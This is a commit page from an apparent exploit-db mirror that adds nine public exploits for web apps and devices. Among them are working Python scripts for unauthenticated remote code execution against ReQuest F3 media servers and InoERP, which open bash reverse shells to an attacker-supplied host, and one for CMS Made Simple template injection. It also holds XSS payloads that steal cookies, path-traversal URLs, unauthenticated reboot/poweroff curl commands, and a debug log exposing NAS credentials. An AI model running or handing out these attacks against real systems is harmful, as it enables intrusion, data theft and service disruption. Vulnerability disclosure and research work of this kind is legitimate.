bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-10-27

Browse source 
9 changes to exploits/shellcodes

CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
InoERP 0.7.2 - Remote Code Execution (Unauthenticated)
PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)
Genexis Platinum-4410 - 'SSID' Persistent XSS
ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure
ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
This commit is contained in:
Offensive Security 2020-10-27 05:02:17 +00:00
parent 99b2cc4c13
commit 7ce71393bb
10 changed files with 577 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/hardware/webapps/48948.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Persistent XSS in SSID
# Date: 10/24/2020
# Exploit Author: Amal Mohandas
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
Vulnerability Details
======================
Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS
in the SSID parameter. This could allow attackers to perform malicious
action in which the XSS popup will affect all privileged users.
How to reproduce
===================
1. Login to the firmware as any user
2. Navigate to Net tab--> WLAN
3. Enter below mentioned payload in "SSID" text box
<script>alert(1)</script>
4. Click on the "OK" button.
5. Relogin as any user and again navigate to Net tab--> WLAN
6. Observe the XSS popup showing persistent XSS

94
exploits/hardware/webapps/48949.txt Normal file
View file

@ -0,0 +1,94 @@
# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0
ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability
Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 3.0.0
2.1.0.831
1.5.2.822
1.5.2.821
1.5.1.820
Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
approved NAS) can be connected through your home network to your ReQuest system,
delivering HD video to your television in 1080p via HDMI outputs.
Desc: The device suffers from an unauthenticated file disclosure vulnerability
when input passed through the 'file' parameter in tail.html and file.html script
is not properly verified before being used to read web log files. This can be
exploited to disclose contents of files from local resources.
===============================================================================
/tail.html:
-----------
function load_data()
{
var elem = $("#data");
$.ajax({url:"tail.html",
data:{
file:elem.attr("file"),
start:elem.attr("nextstart"),
tail:elem.attr("tail")?elem.attr("tail"):undefined,
max:elem.attr("max")?elem.attr("max"):undefined},
cache:false,
async:true,
success:show_data}
);
}
function main_start()
{
$("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
window.setTimeout(load_data, 1);
}
function show_data(data, status, jqxhr)
{
var data = $("filedata", data);
var newdata = data.attr("data");
var start = data.attr("start");
var nextstart = data.attr("nextstart");
var elem = $("#data");
var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
elem.attr({tail:"", start:start, nextstart:nextstart});
if (newdata.length)
elem.append(htmlspecialchars(newdata));
var delay = parseFloat(elem.attr("update"))*1000;
if (isNaN(delay))
delay = 5000;
if (at_end)
$("html,body").scrollTop($(document).height());
window.setTimeout(load_data, delay);
}
$(document).ready(main_start);
===============================================================================
Tested on: ReQuestHTTP/0.1 httpserver/0.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5599
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php
01.08.2020
--
http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini

76
exploits/hardware/webapps/48950.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0
ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure
Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
7.0.2.4954
6.5.2.4954
6.4.2.4681
6.3.2.4203
2.0.1.823
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.
Desc: The unprotected web management server is vulnerable to sensitive information
disclosure vulnerability. An unauthenticated attacker can visit the message_log
page and disclose the webserver's Python debug log file containing system information,
credentials, paths, processes and command arguments running on the device.
Tested on: ReQuest Serious Play® OS v7.0.1
ReQuest Serious Play® OS v6.0.0
Debian GNU/Linux 5.0
Linux 3.2.0-4-686-pae
Linux 2.6.36-request+lenny.5
Apache/2.2.22
Apache/2.2.9
PHP/5.4.45
PHP/5.2.6-1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2020-5600
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php
01.08.2020
--
$ curl http://192.168.1.17/message_log
...
...
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
...
...

50
exploits/hardware/webapps/48951.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0
Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
7.0.2.4954
6.5.2.4954
6.4.2.4681
6.3.2.4203
2.0.1.823
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.
Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.
Tested on: ReQuest Serious Play® OS v7.0.1
ReQuest Serious Play® OS v6.0.0
Debian GNU/Linux 5.0
Linux 3.2.0-4-686-pae
Linux 2.6.36-request+lenny.5
Apache/2.2.22
Apache/2.2.9
PHP/5.4.45
PHP/5.2.6-1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php
01.08.2020
--
$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot

193
exploits/hardware/webapps/48952.txt Normal file
View file

@ -0,0 +1,193 @@
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
#
#
# Vendor: ReQuest Serious Play LLC
# Product web page: http://www.request.com
# Affected version: 7.0.3.4968 (Pro)
# 7.0.2.4954
# 6.5.2.4954
# 6.4.2.4681
# 6.3.2.4203
# 2.0.1.823
#
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
# into a compact powerhouse. With the ability to add unlimited NAS devices, the
# F3 can handle your entire family's media collection with ease.
#
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
# page (/tools) from the services provided, an attacker can exploit the Quick
# File Uploader (/tools/upload.html) page and upload PHP executable files that
# results in remote code execution as the web server user.
#
# =============================================================================
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
# Let's see waddup...
# Good to go.
# Starting handler on port 6161.
# Writing callback file...
# We got the dir: /75302IV29ZS1
# Checking write status...
# All is well John Spartan. Calling your listener...
# Connection from 192.168.0.17:42057
# You got shell.
# id;uname -ro
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
# 3.2.0-4-686-pae GNU/Linux
# exit
# *** Connection closed by remote host ***
# lqwrm@metalgear:~/prive$
# =============================================================================
#
# Tested on: ReQuest Serious Play® OS v7.0.1
# ReQuest Serious Play® OS v6.0.0
# Debian GNU/Linux 5.0
# Linux 3.2.0-4-686-pae
# Linux 2.6.36-request+lenny.5
# Apache/2.2.22
# Apache/2.2.9
# PHP/5.4.45
# PHP/5.2.6-1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5602
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
#
#
# 01.08.2020
#
from time import sleep
import threading######
import telnetlib######
import requests#######
import socket#########
import sys############
import re#############
class Manhattan:
def __init__(self):
self.secretagent = "Mushu"
self.payload = None
self.deploy = None
self.rhost = None
self.lhost = None
self.lport = None
def the_args(self):
if len(sys.argv) != 4:
self.the_usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def the_usage(self):
self.the_wha()
print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
exit(0)
def the_wha(self):
titl = "ReQuest Serious Play F3 Media Server RCE"
print(titl)
def the_check(self):
print("Let's see waddup...")
try:
r = requests.get(self.rhost + "/MP3/")
if "000000000000" in r.text:
print("Good to go.")
else:
print("Something's fishy.")
exit(-16)
except Exception as e:
print("Hmmm {msg}".format(msg=e))
exit(-1)
def the_upload(self):
print("Writing callback file...")
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
"User-Agent": self.secretagent,
"Accept" : "*/*",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");"
self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
self.deploy += "Content-Disposition: form-data; name=\"uploa" #
self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" #
self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
sleep(1)
r = requests.get(self.rhost + "/MP3/")
regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
print("We got the dir: /" + regex)
print("Checking write status...")
r = requests.get(self.rhost + "/MP3/" + regex)
if "bd0" in r.text:
print("All is well John Spartan. Calling your listener...")
else:
print("Something...isn't right.")
exit(-16)
requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")
def the_subp(self):
konac = threading.Thread(name="ZSL", target=self.the_ear)
konac.start()
sleep(1)
self.the_upload()
def the_ear(self):
telnetus = telnetlib.Telnet()
print("Starting handler on port {}.".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("Hmmm ({msg})".format(msg=p))
s.close()
exit(0)
break
print("You got shell.")
telnetus.interact()
conn.close()
def main(self):
self.the_args()
self.the_check()
self.the_subp()
if __name__ == '__main__':
Manhattan().main()

55
exploits/php/webapps/48944.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
# Google Dork: N/A
# Date: 11/10/2017
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: N/A
# Version: 2.1.6
# Tested on: Linux
# CVE : CVE-2017-16783
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/
PFA
-------
Gurkirat Singh
(tbhaxor <https://google.com/search?q=tbhaxor>)
from argparse import ArgumentParser, RawTextHelpFormatter
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
import requests as http
import re
from bs4 import BeautifulSoup, Tag
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
formatter_class=RawTextHelpFormatter)
parser.add_argument(
"--target",
"-t",
help="complete remote target with protocol, host, path and query",
required=True,
dest="t")
parser.add_argument("--command",
"-c",
help="command to execute (default: whoami)",
default="whoami",
dest="c")
args = parser.parse_args()
print(info("Building malicious url"))
url = urlparse(args.t)
query = parse_qs(url.query)
query["cntnt01detailtemplate"] = [
"string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
]
query = {k: ",".join(v) for k, v in query.items()}
query = unquote_plus(urlencode(query, doseq=False))
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
print(good("Done"))
print(info("Executing payload"))
r = http.get(_url)
html = BeautifulSoup(r.content.decode(), "html5lib")
main: Tag = html.find("article", {"id": "main"})
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
print(good("Done"))
print(info("Result"))
print(main)

19
exploits/php/webapps/48945.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/24
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Vulnerable Pages:
http://localhost/healthcare/Users/registration.php
http://localhost/healthcare/Doctor/doctor_registration.php
Proof of Concept:
1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.
2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.

28
exploits/php/webapps/48946.py Executable file
View file

@ -0,0 +1,28 @@
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exploit Title: InoERP 0.7.2 Unauthenticated Remote Code Execution
# Date: March 14, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
# Software Link: https://github.com/inoerp/inoERP
# Version: 0.7.2
# Tested on: Ubuntu 19
import requests
import os
import sys
if len (sys.argv) != 4:
print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
else:
target_url = sys.argv[1]
attacker_ip = sys.argv[2]
listening_port = sys.argv[3]
target_url += "/modules/sys/form_personalization/json_fp.php"
target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}
requests.post(target_url, headers=target_headers, data=expl_data)
print ("Check your listener.")

31
exploits/php/webapps/48947.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).
Stored XSS:
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser.
Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.
POST /ckeditor/plugins/pdw_file_browser/actions.php
HTTP/1.1 Host: <HOSTNAME>
[…]
action=rename&new_filename=<svg+onload=alert(document.cookie
s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ
e=file
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe
cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%
3E&type=file
Happy Hacking :^)

9
files_exploits.csv
View file

@ -40762,6 +40762,15 @@ id,file,description,date,author,type,platform,port
48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php,
48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,
48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php,
48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php,
48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware,
48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware,
48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.